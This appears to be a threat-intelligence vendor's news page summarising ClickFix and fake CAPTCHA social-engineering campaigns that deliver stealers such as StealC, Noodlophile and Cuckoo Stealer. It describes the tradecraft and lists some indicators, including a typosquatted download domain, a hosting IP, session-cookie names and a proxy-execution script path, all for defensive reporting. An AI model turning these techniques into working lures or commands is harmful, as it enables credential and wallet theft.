Fake CAPTCHA and ClickFix Social Engineering Used to Deliver Stealer Malware
A wave of social-engineering-driven malware delivery is abusing “verification” and “fix” workflows to trick users into running attacker-supplied commands that install information stealers. LevelBlue reported a campaign using fake Cloudflare-style CAPTCHA pages on compromised websites to convince Windows users to manually execute malicious PowerShell commands, resulting in StealC deployment; StealC is described as exfiltrating browser credentials, crypto wallet data, Steam and Outlook credentials, system information, and screenshots over RC4-encrypted HTTP to a C2 server. Intego also identified an evolved ClickFix technique on macOS (“Matryoshka”) that leverages typosquatting to redirect users to pages instructing them to paste “fix” commands into Terminal; the loader then retrieves an AppleScript payload to steal browser credentials and target wallet apps (e.g., Trezor Suite, Ledger Live), including repeated fake password prompts as a fallback.
Separately, other credential-theft campaigns are also leaning heavily on lures that exploit user trust and routine workflows. Morphisec described Noodlophile evolving from fake AI video platform ads to fake job postings and phishing “assessments,” delivering multi-stage stealers/RATs via techniques including DLL sideloading, while continuing to use Telegram bots for exfiltration/C2 and adding file-bloating content intended to disrupt automated analysis. These developments reinforce that user-in-the-loop execution (copy/paste commands, “verification” steps, and recruitment-themed forms) remains a high-yield initial access vector for stealers across both Windows and macOS environments.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
5 events from the most recent confirmed update back to the earliest known activity.
Matryoshka ClickFix variant targets macOS users with stealer malware
Researchers described an evolved ClickFix technique dubbed Matryoshka that used typosquatting domains and nested obfuscation to trick macOS users into pasting a fake fix command into Terminal. The attack executed largely in memory, then retrieved an AppleScript payload to steal browser credentials and target cryptocurrency wallet applications such as Trezor Suite and Ledger Live.
ClickFix campaign uses fake CAPTCHA pages to deliver StealC on Windows
A social engineering campaign was observed using fake Cloudflare-style CAPTCHA pages on compromised legitimate websites to trick Windows users into pasting and running malicious PowerShell from the Run dialog. The fileless chain fetched in-memory shellcode and a downloader that ultimately injected StealC into svchost.exe for credential, wallet, and system data theft.
Researchers document anti-analysis upgrades in newer Noodlophile samples
Analysts reported that newer Noodlophile samples added retaliatory anti-analysis padding aimed at crashing AI-based analysis pipelines, along with djb2-based dynamic API resolution, tamper checks, RC4-encrypted command files, and XOR-encoded strings. Telegram remained central to command-and-control and exfiltration.
Noodlophile campaign shifts to fake job postings and phishing lures
By February 2026, the Noodlophile operators had evolved their delivery tactics to use remote-work themed social engineering, including fake job postings, application forms, and skill tests. The campaign delivered multi-stage stealers and RATs, including via DLL sideloading, and was linked to the Vietnamese group UNC6229.
Noodlophile stealer first reported in social media ad campaign
The Noodlophile information-stealer was first reported in May 2025, when it was being distributed through fake AI video generator ads on social media. The malware stole credentials and cryptocurrency wallet data and used Telegram bots for exfiltration.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
Fake CAPTCHA Scam Tricks Windows Users Into Installing Malware
techrepublic.com
Open sourceNoodlophile Malware Creators Evolve Tactics with Fake Job Postings and Phishing Lures
cybersecuritynews.com
Open sourceNew Clickfix variant 'Matryoshka' Attacking Users to Deploy macOS Stealer Malware
cybersecuritynews.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Fake CAPTCHA/ClickFix Social Engineering Used to Deliver Malware and Steal Sessions
Threat actors are increasingly using **fake CAPTCHA / verification pages** as a scalable social-engineering lure to deliver malware and steal credentials by abusing users’ trust in routine web security checks. Research highlighted a large, fragmented ecosystem of lookalike fake CAPTCHA pages hosted across **~9,494 compromised sites and malicious properties**, where roughly **70%** of observed pages share near-identical visuals while delivering **dozens of distinct payload variants** via different execution models, including clipboard-driven instructions that lead victims to run **PowerShell** or **VBScript** downloaders. Separately, a **ClickFix** campaign targeting Facebook users—especially content creators and businesses seeking verification—uses fake “verification” portals to trick victims into manually extracting and submitting browser session tokens (notably `c_user` and `xs`) via developer tools, enabling account takeover without exploiting software vulnerabilities. In parallel, the **ClearFake** campaign (a malicious JavaScript framework injected into hacked websites) has adopted ClickFix-style fake CAPTCHA lures and added more evasive “living off the land” behavior, including **proxy execution** to run PowerShell through trusted Windows features and shifting distribution to a **popular CDN**, reducing the effectiveness of defenses that rely primarily on blocking known-bad domains/IPs.
Mar 21, 2026
Fake CAPTCHA (ClickFix) Social Engineering Used for Fileless Malware Delivery
Security researchers reported an active malware distribution technique that abuses **bogus CAPTCHA** pages to trick users into executing attacker-supplied commands on Windows. In the **ClearFake** campaign analyzed by Expel, victims land on a compromised site and are instructed to press `Win + R`, then paste and run a clipboard-seeded command—an approach commonly referred to as **ClickFix**—which results in malicious **PowerShell** execution. The campaign emphasizes *living-off-the-land* tradecraft and evasion, including **proxy execution** by abusing the trusted Windows script `C:\Windows\System32\SyncAppvPublishingServer.vbs` to launch PowerShell in hidden mode and reduce the chance of AV detection. Separate measurement and telemetry on the same broader tactic found large-scale infrastructure supporting fake CAPTCHA lures: a Censys analysis identified **9,494** breached websites hosting counterfeit verification pages, with ~**70%** appearing nearly identical. The most common infection mechanisms involved **clipboard manipulation** leading to **VBScript** and **PowerShell** execution (with significant counts of each observed), alongside other delivery paths such as `MSIEXEC`-based installation of malicious Windows Installer packages. Researchers also observed use of the **Matrix** push command-and-control framework to support **fileless** deployment, noting that these intrusions can leave no traditional executable artifacts and may evade signature-based detection.
Mar 21, 2026
ClickFix Social Engineering Drives Multi-Platform Malware Delivery
Security researchers reported multiple active campaigns using **ClickFix** social engineering—fake error dialogs or verification prompts that trick users into manually running attacker-supplied commands—to bypass browser and download protections and establish an initial foothold. In one enterprise case investigated by **CERT Polska (cert.pl)**, victims were lured via compromised websites showing a fake CAPTCHA/“fix” prompt that instructed them to paste and run a **PowerShell** command via `Win+R`; the script then downloaded a dropper and enabled rapid follow-on activity that can scale to **enterprise-wide compromise**, including deployment of secondary malware such as **Latrodectus** and **Supper** for data theft, lateral movement, and potential ransomware staging. A separate ClickFix operation targeted **macOS developers** by cloning the *Homebrew* site on typosquatted infrastructure; the “install” command was subtly altered to fetch content from `raw.homabrews.org` instead of `raw.githubusercontent.com`, leading to **Cuckoo Stealer** deployment and credential harvesting via repeated password prompts using macOS Directory Services, with related domains tied to shared hosting at **`5.255.123.244`**. ClickFix was also observed as the initial execution mechanism for the resurfaced **Matanbuchus 3.0** MaaS loader, which uses deceptive copy/paste prompts and **silent MSI** execution (via `msiexec`) to deliver a new payload, **AstarionRAT**, enabling capabilities including credential theft and **SOCKS5** proxying; operators were reported to move laterally quickly (including toward domain controllers), consistent with ransomware or data-exfiltration objectives.
Mar 21, 2026